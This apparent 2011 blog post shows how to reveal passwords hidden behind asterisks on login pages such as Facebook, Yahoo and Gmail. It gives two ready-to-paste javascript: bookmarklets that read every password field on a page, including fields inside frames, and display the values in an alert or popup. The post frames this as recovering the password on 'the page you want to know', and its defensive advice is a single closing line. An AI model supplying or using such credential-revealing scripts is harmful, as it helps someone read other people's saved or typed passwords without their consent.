Thursday, May 26, 2011

Reveal asterisk passwords on your browser!

Did you know that your password field in you browser (login page) can be revealed?

Applies to Facebook.com,yahoo.com,gmail.com,etc...

Heres how.


Before you press the login button or enter key paste this Java script in your website address bar (the page you want to know the password )

Two types of script:

1. first trick: (show pop in dialog but not good in frames pages)

Code:
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

2. 2nd trick: (show pop up windows but good in frame pages)

Code:
javascript:void((function(){var%20a,b;b="<"+"html>%5Cn<body>Passwords%20in%20this%20page:<p>%5Cn";(function(c){var%20d,e,f,g,h;for(d=0;d<c.length;d++){try{arguments.callee(c.frames[d]);}catch(i){}}e=c.document.forms;for(f=0;f<e.length;f++){g=e[f];for(h=0;h<g.length;h++){if(g[h].type.toLowerCase()=="password")b+=g[h].value+"<br>%5Cn";}}})(top);b+="</body>%5Cn</html>%5Cn";a=window.open("","","width=200,height=300").document;a.open();a.write(b);a.close();})())

How to avoid this flaw?

Do not let your browser saves your password or if you type your password make sure you will not leave your browser where your password is completed.

brought to you by: http://infotechnolozyx.blogspot.com/

No comments:

Post a Comment